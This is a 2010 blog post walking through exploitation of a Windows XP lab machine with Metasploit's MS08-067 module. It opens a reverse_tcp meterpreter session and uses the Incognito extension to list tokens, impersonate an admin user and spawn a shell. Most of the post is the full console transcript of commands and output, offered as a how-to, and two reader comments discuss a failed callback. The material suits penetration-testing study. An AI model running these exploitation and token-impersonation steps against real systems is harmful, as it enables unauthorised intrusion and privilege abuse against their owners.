Using Metasploit’s Incognito To Impersonate User Tokens

January 30, 2010 – 10:48 AM

I just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system.  You can think of tokens as a web “cookie” which is just an object that holds your security information for the entire login process so that you don’t have to re-authenticate yourself on the system or network each time you want to access another object.  You can read more about tokens here:

On this particular machine, “Troy” is an Admin account.

(without all the screenshots – sorry dial-up users)

We’ll start off by launching Metasploit and exploiting the system.  For this we need to make sure the payload returns a meterpreter session back to us:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:
Name     Current Setting  Required  Description
—-     —————  ——–  ———–
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
—-      —————  ——–  ———–
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:
Id  Name
—  —-
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost
rhost =>
msf exploit(ms08_067_netapi) > set lhost
lhost =>
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened ( ->

meterpreter >

Once we have a meterpreter session we can launch the Incognito module, list the available tokens and impersonate the one you want:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use Incognito
Loading extension incognito…success.
meterpreter > list_tokens -u
Delegation Tokens Available
Impersonation Tokens Available
meterpreter > impersonate_token vm-winxp\\troy
[+] Delegation token available
[+] Successfully impersonated user VM-WINXP\Troy
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > execute -f cmd.exe -i -t
Process 416 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Complete success without having to crack passwords or “pass the hash”.

  1. 2 Responses to “Using Metasploit’s Incognito To Impersonate User Tokens”

  2. [*] Started reverse handler on
    [-] Exploit failed: The connection was refused by the remote host (
    [*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >

    By xpl on Apr 23, 2010

  3. This is because Egress filterting or AV is preventing it to connect back to your machine.

    By saurabh harit on Sep 28, 2010

You must be logged in to post a comment.